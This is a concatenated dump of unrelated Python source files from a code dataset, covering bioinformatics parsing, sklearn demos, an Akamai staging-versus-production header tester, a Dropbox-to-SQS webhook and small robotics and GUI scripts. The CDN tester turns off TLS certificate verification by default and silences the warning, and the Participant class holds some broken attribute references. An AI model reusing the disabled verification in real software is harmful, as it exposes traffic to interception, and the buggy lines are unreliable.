\n\nclass Participant(psimi.Base): \n \"\"\"Biomolecule form as used in the experiment. Corresponds to\n ... element of the PSI-MI XML record.\n \"\"\"\n def __init__( self, prt=None, root=None ):\n super(Participant, self ).__init__( raw = prt, root = root)\n \n def __repr__(self):\n rep=[]\n rep.append(\" Participant:\")\n rep.append(\" Label:\\t\" + str(self.ilabel))\n rep.append(\" Name:\\t\" + str(self.iname))\n rep.append(\" Species:\\t\" + str(self.ispecies))\n rep.append(\" IPXref:\\t\" + str(self.ipxref))\n if self.isxref and len(self.isxref) > 0:\n rep.append(\" ISXref:\" )\n for sx in self.isxref:\n rep.append(\"\\t\\t\" + str(sx))\n\n rep.append(\" PXref:\\t\" + str(self.pxref))\n if self.sxref and len(self.sxref) > 0:\n rep.append(\" SXref:\" )\n for sx in self.sxref:\n rep.append(\"\\t\\t\" + str(xs))\n if self.ehost:\n rep.append(\" Exp Host:\\t\" + str(self.ehost))\n else:\n rep.append(\" Exp Host:\\t\" + str(self.ispecies))\n \n rep.append(\" Exp Prep:\\t\" + str(self.eprep))\n rep.append(\" Exp Role:\\t\" + str(self.erole))\n rep.append(\" Bio Role:\\t\" + str(self.brole))\n rep.append(\" Id Method:\\t\" + str(self.pidmth))\n \n if self.frolst and len( self.frolst ) > 0:\n rep.append(\" Features:\")\n for f in self.frolst:\n rep.append( \" \" + str(f) ) \n rep.append(\"\")\n return '\\n'.join(rep)\n\n @property\n def interactor(self):\n \"\"\"psimi.Interactor object representing the reference version of\n the biomolecule.\n \"\"\" \n return psimi.Interactor(self._raw['i10r'], self._root)\n\n @property\n def prt(self):\n \"\"\"Raw participant record data structure.\n \"\"\" \n return self._raw\n \n @property\n def iname( self ):\n \"\"\"Interactor name\n \"\"\"\n if 'name' in self._raw['i10r'].keys():\n return self._raw['i10r']['name']\n return None\n \n @property\n def ilabel( self ):\n \"\"\"Interactor short(er) label\n \"\"\"\n if 'label' in self._raw['i10r']:\n return self._raw['i10r']['label']\n else: \n return self._raw['i10r']['pxref'][0]['ac']\n\n @property\n def ispecies( self ):\n \"\"\"Interactor species. Native species the biomolecule is made in\"\"\"\n if 'species' in self._raw['i10r'].keys():\n if self._raw['i10r']['species'] is not None: \n return self._raw['i10r']['species']\n return None\n\n @property\n def ehost( self ):\n \"\"\"Experimental host list. The list of the organism(s) that the \n biomolecule used in the experiment was produced in.\n \"\"\"\n if 'ehost' in self._raw.keys():\n return list(self._raw['ehost'])\n return None\n \n @property\n def erole( self ):\n \"\"\"Experimental role list . The list of experimental roles \n (e.g. bait, prey) of the participant in the experiment.\n \"\"\" \n if 'erole' in self._raw.keys():\n return self._raw['erole']\n \n self.prt['erole'] = None \n return None\n\n @property\n def brole( self ):\n \"\"\"Biological role. The biological role of the participant\n (e.g. enzyme, enzyme target0, as used in the experiment.\n \"\"\"\n if 'brole' in self._raw.keys():\n return self._raw['brole']\n else:\n self.__prt['brole'] = None \n return None\n\n @property\n def eprep( self ):\n \"\"\"Experimental preparation (list). Terms describing experimental\n preparation of the participant.\n \"\"\"\n if 'eprep' in self._raw.keys():\n return self._raw['eprep']\n else:\n self._prt['eprep'] = None \n return None\n\n @property\n def pidmth( self ):\n \"\"\"Participant identification method (list). The methods used to\n identify the molecule as participating in the interactions.\n \"\"\"\n if 'pidmth' in self._raw.keys():\n return self._raw['pidmth']\n else:\n self._raw['pidmth'] = None \n return None\n \n @property\n def ipxref( self ):\n \"\"\"Primary cross-reference of the interactor.\n \"\"\"\n return self.interactor.pxref\n\n @property\n def isxref( self ):\n \"\"\"Secondary cross-references of the interactor. \n \"\"\"\n return self.interactor.sxref\n \n @property\n def attrib( self):\n \"\"\"Attribute list.\n \"\"\"\n if 'attrib' in self._raw.keys():\n return self._raw['attrib']\n else:\n return None\n\n @property\n def feature( self ):\n \"\"\"A list of raw records describing features relavant for the\n experiment that demonstrated described interaction.\n \"\"\"\n if 'feature' in self._raw.keys():\n return self._raw['feature']\n else:\n return None\n\n @property\n def frolst( self ):\n \"\"\"A list of psimi.Feature objects describing features relavant\n for the experiment that demonstrated described interaction.\n \"\"\"\n if 'feature' in self._raw.keys() and len( self._raw['feature']) > 0:\n frolst = []\n for fr in self._raw['feature']:\n frolst.append(psimi.Feature(fr, self._root ) )\n return frolst \n return None\n\n \n","sub_path":"pylib/pymex/psimi/participant.py","file_name":"participant.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"593774084","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nfrom sklearn import neighbors, datasets, cluster, svm\niris = datasets.load_iris()\nknn = neighbors.KNeighborsClassifier()\nknn.fit(iris.data, iris.target)\nresult0 = knn.predict([[5.0, 3.0, 5.0, 2.0]])\npred0 = knn.predict(iris.data)\n\n\nkmeans = cluster.KMeans(n_clusters=3).fit(iris.data)\npred1 = kmeans.predict(iris.data)\nresult1 = kmeans.predict([[5.0, 3.0, 5.0, 2.0]])\n\nsvc = svm.LinearSVC()\nsvc.fit(iris.data, iris.target)\nresult2 = svc.predict([[5.0, 3.0, 5.0, 2.0]])\npred2 = svc.predict(iris.data)\n\nprint(\"{}:{}:{}\".format(result0, result1, result2))\n\nfor lable in pred0:\n print(lable, end=\" \")\n\nprint('\\n')\nfor lable in pred1:\n print(lable, end=\" \")\n\nprint('\\n')\nfor lable in pred2:\n print(lable, end=\" \")\n\nprint('\\n')\nfor lable in iris.target:\n print(lable, end=' ')\n","sub_path":"chapter4/iris.py","file_name":"iris.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"175583765","text":"#example of tuples in python\nt = 'example1', 'example2', 'example3';\nprint(t)\n\nmultiTuple = 'simple', t, ('mulit', 'tuple')\nprint(multiTuple)\nprint(multiTuple[0])\n\n#empty tuple\nempty = ()\n\n#one element tupple -> necessery to add comma to the end\noneElementTuple = 'one',\n\n#unpacking tuples\nunpacker = ('unpack', 'simple', 'this', 'tuple')\na, b, c, d = unpacker\n\nprint(a + b + c + d)\n#tuples are immutable, you can't change current value of tuple \n","sub_path":"basics/tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"426994520","text":"import numpy as np\n\ndef algo(a, b, c, d):\n\t'''\n\tTridiagonal algorithm\n\t|\tb1 \tc1 \t0 \t0\t|\td1\t|\n\t|\ta1 \tb2 \tc2 \t0\t|\td2\t|\n\t|\t0\ta2\tb3\tc3\t|\td3\t|\n\t|\t0\t0\ta3\tb4\t|\td4\t|\n\t->\n\t|\tx1\tx2\tx3\tx4\t|\n\t'''\n\n\tnf = len(d) # number of equations\n\tac, bc, cc, dc = tuple(map(np.array, (a, b, c, d))) # copy arrays\n\tfor it in range(1, nf):\n\t\tmc = ac[it - 1] / bc[it - 1]\n\t\tbc[it] = bc[it] - mc * cc[it - 1] \n\t\tdc[it] = dc[it] - mc * dc[it - 1]\n\n\txc = bc\n\txc[-1] = dc[-1]/bc[-1]\n\n\tfor il in range(nf-2, -1, -1):\n\t\txc[il] = (dc[il]-cc[il]*xc[il+1])/bc[il]\n\n\treturn xc\n\ndef matrix_to_3list(arr):\n\t'''\n\tConvert matrix to 3 vectors:\n\tArr -> \n\t|\tb1 \tc1 \t0 \t0\t|\n\t|\ta1 \tb2 \tc2 \t0\t|\n\t|\t0\ta2\tb3\tc3\t|\n\t|\t0\t0\ta3\tb4\t|\n\t'''\n\tm, n = np.shape(arr)\n\t# if np.linalg.det(arr) == 0:\n\t# \treturn -1\n\tif m != n:\n\t\tprint('m != n')\n\t\treturn -1\n\tfor i in range(n):\n\t\tfor j in range(n):\n\t\t\tif (i == j) or (i - 1 == j) or (i + 1 == j):\n\t\t\t\tif arr[i][j] == 0:\n\t\t\t\t\tprint('arr[i][j] == 0')\n\t\t\t\t\treturn -1\n\t\t\telse:\n\t\t\t\tif arr[i][j] != 0:\n\t\t\t\t\tprint('arr[i][j] != 0')\n\t\t\t\t\treturn -1\n\ta, b, c = [], [], []\n\tfor i in range(n):\n\t\tb.append(arr[i][i])\n\t\tif i != 0:\n\t\t\ta.append(arr[i][i - 1])\n\t\t\tc.append(arr[i - 1][i])\n\treturn tuple(map(np.array, (a, b, c)))","sub_path":"algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"77946472","text":"print(\"value separated by enter keyword\")\r\nn=int(input(\"Enter the range of array :\"))\r\n\r\narr=[float(input()) for i in range(0,n)]\r\n\r\nmax=arr[0]\r\nfor i in range(0,n):\r\n\tif max < arr[i]:\r\n\t\tmax=arr[i]\r\n\telse:\r\n\t\tcontinue\r\nprint(\"The maximum no is {}\".format(max))","sub_path":"maximum in array.py","file_name":"maximum in array.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"129477768","text":"import requests\nimport urllib3\nimport csv\nimport re\nimport json\nimport htmlp, rname\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nAKAM_PRAGMA='akamai-x-get-request-id, akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable,akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-feo-trace'\nAKAM_CHDR=['x-cache-key', 'x-true-cache-key', 'x-check-cacheable', 'x-akamai-staging']\nDEFAULT_CHDR=['location', 'content-encoding', 'etag', 'server', 'content-length', 'last-modified', 'content-type', 'cache-control', 'edge-control']\n\n\nclass Actor(object):\n def __init__(self, connhost=None):\n self.connhost=connhost\n self.req=None\n\n def get(self, url, params=None, **kargs):\n if 'headers' not in kargs:\n kargs['headers'] = dict()\n kargs['headers'].update({'Pragma': AKAM_PRAGMA})\n \n # spoofing\n if self.connhost is not None:\n # parse host \n match = re.search('(http|https):\\/\\/([^\\/]+)(\\/.*$|$)', url)\n assert match is not None\n host=match.group(2)\n url=url.replace(host, self.connhost)\n \n if 'headers' not in kargs:\n kargs['headers'] = dict()\n kargs['headers'].update({'Host': host})\n \n if 'verify' not in kargs:\n kargs['verify']=False\n\n \n r=requests.get(url, params, **kargs)\n self.req=r\n #self.dump(r)\n\n def dump(self, req=None):\n #pre=r.prepare()\n if req is None:\n assert self.req is not None\n req=self.req\n\n print('{} {}'.format(req.request.method, req.request.url))\n for k,v in req.request.headers.items():\n print(k,v)\n else:\n print()\n\n print(req.status_code)\n for k,v in req.headers.items():\n print(k,v)\n\n \nclass Tester(object):\n '''\n feddata: [url] [tobe] [tobe code] [result] [result code] [judge]\n '''\n def __init__(self, prodhost, stghost):\n self.a=Actor()\n self.prod=Actor(prodhost)\n self.stg=Actor(stghost)\n \n\n def redirect(self, testcasefile):\n '''\n testcasefile should contain list of redirect testcase like:\n [from url] [to url] [status code]\n http://abc.com/a.html?abc=123 https://foo.com/erro.html 301\n http://abc.com/a.html https://bar.com/ 302\n ....\n '''\n rows=[]\n with open(testcasefile) as f:\n for line in f:\n rows.append( re.split('[ \\t]+', line) )\n \n for r in rows:\n self.a.get(r[0], allow_redirects=False)\n ret='NG'\n if self.a.req.status_code == int(r[2]):\n assert 'Location' in self.a.req.headers or 'location' in self.a.req.headers\n if self.a.req.headers['location'] == r[1]:\n ret='Passed'\n elif r[1].endswith(self.a.req.headers['location']):\n ret='Contains'\n else:\n print('>>>> {} vs {}'.format(self.a.req.headers['location'], r[1]))\n \n akamemo=''\n if 'x-akamai-staging' in self.a.req.headers:\n akamemo = 'x-akamai-staging:{}'.format( self.a.req.headers['x-akamai-staging'] )\n # target(src), ret_code, ret_judge, memo\n print('{}, {}, {}, server:{} {}'.format(r[0], self.a.req.status_code, ret, self.a.req.headers['Server'], akamemo))\n\n def __redirect(self, url, query, prod_actor, stg_actor):\n # scan prod\n prod_location='-'\n prod_actor.get(url, query, allow_redirects=False)\n if 'location' in prod_actor.req.headers:\n prod_location = prod_actor.req.headers['location']\n\n # scan stg\n stg_location='-'\n stg_actor.get(url, query, allow_redirects=False)\n if 'location' in stg_actor.req.headers:\n stg_location = stg_actor.req.headers['location']\n\n # check \n ret='NG'\n if prod_actor.req.status_code == stg_actor.req.status_code:\n if prod_location == stg_location:\n ret='Passed'\n elif prod_location.endswith(stg_location):\n ret='Passed (sub match)'\n elif stg_location.endswith(prod_location):\n ret='Passed (sub match)'\n\n # print: target, prod, prod_code, stg, stg_code, result\n print('{}, {}, {}, {}, {}, {}'.format(prod_actor.req.request.url, prod_location, prod_actor.req.status_code, stg_location, stg_actor.req.status_code, ret))\n\n def redirect2(self, testcasefile, query=''):\n rows=[]\n with open(testcasefile) as f:\n for line in f:\n rows.append( re.split('[ \\t]+', line) )\n #rows.append(line.rstrip())\n\n for r in rows:\n #self.__redirect(r, self.prod, self.stg)\n #self.__redirect(r+query, self.prod, self.stg)\n self.__redirect(r[0], {r[3].rstrip(): 'users/omura/fund_touraku'}, self.prod, self.stg)\n\n def diff(self, urllist):\n diffcnt=0\n cnt=0\n for url in urllist:\n print(url)\n ret = self._diff_header(url, self.prod, self.stg)\n for d in ret['diff']:\n print(' >>', d, ret[d])\n else:\n print()\n if len(ret['diff']) != 0:\n diffcnt+=1\n cnt+=1\n else:\n print('{} diffs out of {} tests'.format(diffcnt, cnt))\n return ret\n\n def diff_fromfile(self, testcasefile):\n urllist=[]\n with open(testcasefile) as f:\n for l in f:\n url = l.strip()\n if url == '':\n continue\n \n urllist.append(url)\n self.diff(urllist)\n\n def _diff_header(self, url, prod_actor, stg_actor, hdrs=[]):\n '''\n hdrs: list: [ 'etag', 'cache-control']\n result:\n ret['date']['prod'] = 'abc123'\n ret['date']['match'] = true\n ret['diff'] = ['etag', 'server']\n {\n 'status' : { 'prod': '200' , 'stg': '200', 'match': 'true'],\n 'diff' : ['etag', 'server']\n }\n '''\n \n prod_actor.get(url, allow_redirects=False)\n stg_actor.get(url, allow_redirects=False)\n #for k,v in stg_actor.req.headers.items():\n # print( '{}: {}'.format(k, v) )\n diff=[]\n ret={}\n ret['status_code'] = { 'prod': prod_actor.req.status_code, 'stg': stg_actor.req.status_code}\n if prod_actor.req.status_code == stg_actor.req.status_code:\n ret['status_code']['match'] = True\n else:\n ret['status_code']['match'] = False\n diff.append('status_code')\n\n chdr = AKAM_CHDR + DEFAULT_CHDR\n for h in hdrs:\n if h.lower() not in chdr:\n chdr.append(h.lower())\n\n for h in chdr:\n cret={}\n if h in prod_actor.req.headers:\n cret['prod']=prod_actor.req.headers[h]\n else:\n cret['prod']=''\n if h in stg_actor.req.headers:\n cret['stg']=stg_actor.req.headers[h]\n else:\n cret['stg']=''\n \n if cret['prod'] == cret['stg']:\n cret['match'] = True\n else:\n cret['match'] = False\n if h != 'x-akamai-staging':\n diff.append(h)\n \n ret[h] = cret\n ret['diff'] = diff\n\n #print(json.dumps(ret, indent=2))\n #stg_actor.dump()\n return ret\n \nif __name__ == '__main__':\n #a=Actor('www.omura.co.jp.edgekey-staging.net')\n #a.get('https://www.omura.co.jp/recruit/', headers={'cookie':'adb'})\n #a.dump()\n #t=Tester('www.omura.co.jp.edgekey-staging.net')\n #t=Tester('www.omura.co.jp.edgekey.net', 'www.omura.co.jp.edgekey-staging.net')\n #t.redirect2('redirectlist_q.txt', '?abc=123')\n\n \n #t=Tester('www.wakodo.co.jp', 'www.wakodo.co.jp.edgekey-staging.net')\n #t._diff_header('http://www.wakodo.co.jp/?id=123', t.prod, t.stg)\n #t._diff_header('http://www-stg.nomura.co.jp/market/movie/customer/summer2.html', t.prod, t.stg)\n #t.diff_fromfile('testcase.txt')\n \n hostname='www.jins.com'\n proto='https://'\n rn=rname.rname()\n prod, stg = rn.get_akname('www.jins.com')\n\n hp=htmlp.Hp()\n hp.parsePage(proto+hostname)\n\n t=Tester(prod, stg)\n t.diff(hp.links)\n\n","sub_path":"actor.py","file_name":"actor.py","file_ext":"py","file_size_in_byte":7626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"181147731","text":"from MongoReader import *\nfrom LineToKeywords import *\nfrom CounterMovingWindow import *\n\nimport curses\nfrom functools import partial\n\ndef UseTop(screen,date,top):\n\tscreen.clear()\n\tscreen.addstr(0, 0, \"--{0}--\".format(date))\n\tline = \"--\" + str(date) + \"--\\n\"\n\tfor pos,(word,count) in enumerate(top):\n\t\tscreen.addstr(pos+1, 0, word)\n\t\tscreen.addstr(pos+1, 15, \"{0}\".format(count))\n\tscreen.refresh()\n\ndef main(screen):\n\twith MongoReader(\"twitter\",\"textPosts\") as reader,LineToKeywords() as lk:\n\t\twindow = CounterMovingWindow(partial(UseTop,screen))\n\t\tfor post in reader:\n\t\t\twords = lk.getKeywords(post['text'])\n\t\t\ttime = post['created_at']\n\t\t\twindow.receivePost(words,time)\n\t\t\nif __name__ == '__main__':\n\ttry:\n\t\tcurses.wrapper(main)\n\texcept KeyboardInterrupt:\n\t\tsys.exit()\n","sub_path":"twitterKeywords/code/Process_Chart.py","file_name":"Process_Chart.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"551185206","text":"from hashlib import sha256\nimport sys\nimport hmac\nimport json\nimport os\nimport logging\nimport boto3\nfrom botocore.exceptions import ClientError\n\nfrom dropbox import Dropbox\nfrom dropbox.files import DeletedMetadata, FolderMetadata, WriteMode\nfrom flask import abort, Flask, send_from_directory, Response, request\nimport redis\n\nfrom environs import Env\n\nenv = Env()\n# Read .env into os.environ\nenv.read_env()\n\nPORT = env.int('PORT')\n\nAWS_ACCESS_KEY = env('AWS_ACCESS_KEY')\nif AWS_ACCESS_KEY is None:\n\tsys.exit('AWS_ACCESS_KEY is not specified')\n\nAWS_SECRET_KEY = env('AWS_SECRET_KEY')\nif AWS_SECRET_KEY is None:\n\tsys.exit('AWS_SECRET_KEY is not specified')\n\n\nAWS_REGION = env('AWS_REGION')\nif AWS_REGION is None:\n\tsys.exit('AWS_REGION is not specified')\n\nSQS_QUEUE_URL = env('SQS_QUEUE_URL')\nif SQS_QUEUE_URL is None:\n\tsys.exit('SQS_QUEUE_URL is not specified')\n\nsqs = boto3.client(\n 'sqs',\n aws_access_key_id=AWS_ACCESS_KEY,\n aws_secret_access_key=AWS_SECRET_KEY,\n\tregion_name=AWS_REGION\n)\n\n\nredis_url = env('REDISTOGO_URL')\nif redis_url is None:\n\tsys.exit('REDISTOGO_URL is not specified')\n\nredis_client = redis.from_url(redis_url)\n\n# App key and secret from the App console (dropbox.com/developers/apps)\nDROPBOX_TOKEN = env('DROPBOX_TOKEN')\nif DROPBOX_TOKEN is None:\n\tsys.exit('DROPBOX_TOKEN is not specified')\n\nDROPBOX_APP_SECRET = env('DROPBOX_APP_SECRET')\nif DROPBOX_APP_SECRET is None:\n\tsys.exit('DROPBOX_APP_SECRET is not specified')\n\nDROPBOX_MONITOR_FOLDOER=env('DROPBOX_MONITOR_FOLDOER')\nif DROPBOX_MONITOR_FOLDOER is None:\n\tsys.exit('DROPBOX_MONITOR_FOLDOER is not specified')\n\napp = Flask(__name__)\napp.debug = True\n\n# A random secret used by Flask to encrypt session data cookies\napp.secret_key = env('FLASK_SECRET_KEY')\nif app.secret_key is None:\n\tsys.exit('FLASK_SECRET_KEY is not specified')\n\ndef process_files(account):\n\t'''Call /files/list_folder for the given user ID and process any changes.'''\n\n\t# cursor for the user (None the first time)\n\tcursor = redis_client.hget('dbx_cursors', account+\"__\"+DROPBOX_MONITOR_FOLDOER)\n\n\tdbx = Dropbox(DROPBOX_TOKEN)\n\thas_more = True\n\n\twhile has_more:\n\t\tif cursor is None:\n\t\t\tresult = dbx.files_list_folder(path=DROPBOX_MONITOR_FOLDOER, recursive=True)\n\t\telse:\n\t\t\tresult = dbx.files_list_folder_continue(cursor.decode('utf-8'))\n\n\t\t#print(result)\n\t\tfor entry in result.entries:\n\t\t\t# Ignore deleted files, folders, and non-markdown files\n\t\t\tif (isinstance(entry, DeletedMetadata) or\n\t\t\t\tisinstance(entry, FolderMetadata) or\n\t\t\t\tnot entry.path_lower.endswith('.srt')):\n\t\t\t\tprint(\"Ignore file:\"+entry.path_display)\n\t\t\t\tcontinue\n\n\t\t\t# Write to SQS queue\n\t\t\tprint(\"Found file:\"+entry.path_display)\n\t\t\tresponse = sqs.send_message(\n\t\t\t\tQueueUrl=SQS_QUEUE_URL,\n\t\t\t\tMessageBody=json.dumps({\n\t\t\t\t\t'source': 'dropbox-otter-transcript-webhook',\n\t\t\t\t\t'entry': {\n\t\t\t\t\t\t'dropbox_id':entry.id,\n\t\t\t\t\t\t'path_lower':entry.path_lower,\n\t\t\t\t\t\t'path_display':entry.path_display\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t\t)\n\t\t\tprint('SQS message for ' + entry.path_display + ' has been sent with id ' + response.get('MessageId'))\n\t\t\t\n\t\t# Update cursor\n\t\tcursor = result.cursor\n\t\tredis_client.hset('dbx_cursors', account+\"__\"+DROPBOX_MONITOR_FOLDOER, cursor)\n\n\t\t# Repeat only if there's more to do\n\t\thas_more = result.has_more\n\n@app.route('/')\ndef index():\n\treturn \"OK\"\n\n@app.route('/robots.txt')\ndef static_from_root():\n\treturn send_from_directory(app.static_folder, request.path[1:])\n\n@app.route('/webhook', methods=['GET'])\ndef challenge():\n\t'''Respond to the webhook challenge (GET request) by echoing back the challenge parameter.'''\n\n\tresp = Response(request.args.get('challenge'))\n\tresp.headers['Content-Type'] = 'text/plain'\n\tresp.headers['X-Content-Type-Options'] = 'nosniff'\n\n\treturn resp\n\n@app.route('/webhook', methods=['POST'])\ndef webhook():\n\t'''Receive a list of changed user IDs from Dropbox and process each.'''\n\n\t# Make sure this is a valid request from Dropbox\n\tsignature = request.headers.get('X-Dropbox-Signature').encode(\"utf-8\")\n\tdigested_signature = hmac.new(bytes(DROPBOX_APP_SECRET,'utf-8'), request.data, sha256).hexdigest().encode()\n\tif not hmac.compare_digest(signature, digested_signature):\n\t\tabort(403)\n\n\tfor account in json.loads(request.data)['list_folder']['accounts']:\n\t\t# We need to respond quickly to the webhook request, so we do the\n\t\t# actual work in a separate thread. For more robustness, it's a\n\t\t# good idea to add the work to a reliable queue and process the queue\n\t\t# in a worker process.\n\t\tprocess_files(account)\n\treturn 'Received'\n\nif __name__=='__main__':\n\tif PORT is not None:\n\t\tapp.run(debug=True, threaded=True, port=PORT)\n\telse:\n\t\tapp.run(debug=True, threaded=True)\n","sub_path":"dropbox_otter_transcript_webhook.py","file_name":"dropbox_otter_transcript_webhook.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"158870624","text":"from django.conf.urls import url\n\nfrom cdh.views.guest import trangchu, danhmuc, khoahoc, baiviet, index, lienhe\n\nurlpatterns = [\n url(r'^$', index.index),\n url(r'^lienhe', lienhe.index, name='lienhe'),\n url(r'^trangchu', trangchu.index, name='trangchu'),\n url(r'^danhmuc/(?P[0-9]+)/', danhmuc.index),\n url(r'^khoahoc/(?P[0-9]+)/', khoahoc.index),\n url(r'^baiviet/(?P[0-9]+)/', baiviet.index),\n url(r'^login', index.index),\n]","sub_path":"cdh/urls/guest.py","file_name":"guest.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"234816523","text":"#The prime factors of 13195 are 5, 7, 13 and 29.\n#What is the largest prime factor of the number 600851475143 ?\nimport math\nimport math\nimport timeit\nimport numpy as np\n\nprimes = []\ndef Esieve(n): \n # Create a boolean array \"prime[0..n]\" and initialize \n # all entries it as true. A value in prime[i] will \n # finally be false if i is Not a prime, else true. \n prime = [True for i in range(n+1)] \n p = 2\n while (p * p <= n): \n \n # If prime[p] is not changed, then it is a prime \n if (prime[p] == True): \n \n # Update all multiples of p \n for i in range(p * p, n+1, p): \n prime[i] = False\n p += 1\n \n # Print all prime numbers \n for p in range(2, n): \n if prime[p]: \n primes.append(p)\n\ndef factor(num):\n fact = []\n for p in primes:\n while num % p == 0:\n fact.append(p)\n num = num/p\n if num == 1:\n print(max(fact))\nEsieve(10000)\nfactor(600851475143)\n\n\n","sub_path":"Project Euler/Complete/003_Largest_prime_factor.py","file_name":"003_Largest_prime_factor.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"474370557","text":"import sim\nimport sys\nimport time\nimport math\n\n\ndef gripper(j1,j2, clientID, close):\n if(close == True):\n sim.simxSetJointTargetVelocity(clientID, j2,0.04, sim.simx_opmode_oneshot)\n else:\n sim.simxSetJointTargetVelocity(clientID, j2,-0.04, sim.simx_opmode_oneshot)\n r, p2 = sim.simxGetJointPosition(clientID, j2,sim.simx_opmode_oneshot)\n sim.simxSetJointTargetPosition(clientID,j1, p2*-1, sim.simx_opmode_oneshot)\n\n\nprint ('Programa inicio')\nsim.simxFinish(-1) # cerrar todas las conexiones\n# Conectar a CoppeliaSim\nclientID=sim.simxStart('127.0.0.1',19999,True,True,5000,5)\nif clientID!=-1:\n print ('Conectado al API del servidor remoto')\n\n _, M1 =sim.simxGetObjectHandle(clientID, 'youBotArmJoint0', sim.simx_opmode_blocking)\n _, M2 =sim.simxGetObjectHandle(clientID, 'youBotArmJoint1', sim.simx_opmode_blocking)\n _, M3 =sim.simxGetObjectHandle(clientID, 'youBotArmJoint2', sim.simx_opmode_blocking)\n _, M4 =sim.simxGetObjectHandle(clientID, 'youBotArmJoint3', sim.simx_opmode_blocking)\n _, M5 =sim.simxGetObjectHandle(clientID, 'youBotArmJoint4', sim.simx_opmode_blocking)\n sim.simxSetJointPosition(clientID, M1,0*math.pi/180,sim.simx_opmode_streaming)\n sim.simxSetJointPosition(clientID, M2,0*math.pi/180,sim.simx_opmode_streaming)\n sim.simxSetJointPosition(clientID, M3,0*math.pi/180,sim.simx_opmode_streaming)\n sim.simxSetJointPosition(clientID, M4,0*math.pi/180,sim.simx_opmode_streaming)\n sim.simxSetJointPosition(clientID, M5,0*math.pi/180,sim.simx_opmode_streaming)\n\n _, j1 =sim.simxGetObjectHandle(clientID, 'youBotGripperJoint1', sim.simx_opmode_blocking)\n _, j2 =sim.simxGetObjectHandle(clientID, 'youBotGripperJoint2', sim.simx_opmode_blocking)\n\n for i in range(5):\n print(\"Abrir\")\n gripper(j1, j2, clientID, True)\n time.sleep(2)\n print(\"Cerrar\")\n gripper(j1, j2, clientID, False)\n time.sleep(2)\n\n\n #sim.simxSetJointTargetVelocity(clientID, j1,-0.02, sim.simx_opmode_blocking)\n\n print(\"velocidad\")\n time.sleep(1)\n # Ahora cerrar la conexion a CoppeliaSim:\n sim.simxFinish(clientID)\nelse:\n sys.exit('Fallo conectando al API del servidor remoto')\nprint ('Programa finalizado')\n","sub_path":"movimiento_basic.py","file_name":"movimiento_basic.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"320530071","text":"import tkinter as tk\n\nclass Aplicacion:\n def __init__(self):\n self.ventana1=tk.Tk()\n \n self.label1=tk.Label(self.ventana1,text=\"Ingrese primer valor:\")\n self.label1.grid(column=0, row=0)\n \n self.dato1=tk.StringVar()\n self.entry1=tk.Entry(self.ventana1, width=20, textvariable=self.dato1)\n self.entry1.grid(column=1, row=0)\n \n self.label1=tk.Label(self.ventana1,text=\"Ingrese segundo valor:\")\n self.label1.grid(column=0, row=1)\n \n self.dato2=tk.StringVar()\n self.entry1=tk.Entry(self.ventana1, width=20, textvariable=self.dato2)\n self.entry1.grid(column=1, row=1)\n\n self.boton1=tk.Button(self.ventana1, text=\"Calcular\", command=self.calcular)\n self.boton1.grid(column=1, row=2)\n\n self.label2=tk.Label(self.ventana1,text=\"RESULTADO\")\n self.label2.grid(column=0, row=3)\n \n self.label3=tk.Label(self.ventana1,text=\"0\")\n self.label3.grid(column=1,row=3)\n self.ventana1.mainloop()\n\n def calcular(self):\n suma=int(self.dato1.get())+int(self.dato2.get())\n self.label3.configure(text=suma)\n\naplicacion1=Aplicacion()","sub_path":"ejercicio222.py","file_name":"ejercicio222.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637377811","text":"from __future__ import print_function\n\nimport sys\nimport os\nimport time\n\nfrom PyQt5 import uic\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\n\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\nfrom skimage import io\nimport glob\n\nimport utils\n\nfrom matplotlib.widgets import RectangleSelector\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nbase_dir = os.path.dirname(os.path.abspath(__file__))\nui_path = os.path.join(base_dir, 'main.ui')\nUi_MainWindow, QtBaseClass = uic.loadUiType(ui_path)\n\n# Camera settings: 640x480, RGB32, 350fps\n\n# The robustness of the detector would really benefit from having a light on the ROI.\n\n# TODO add ROI selector.\n# Can display a single image from each step of the total sequence and select the ROI.\n# Just like I was hard coding, but this is more user friendly.\n# Have a step button to step through each photo in the sequence to make sure the ROI is in a good spot.\n# This is a hella good idea and really makes this project sing, baby.\n\n\nclass GlueApp(QMainWindow):\n def __init__(self):\n super(GlueApp, self).__init__()\n self.ui = 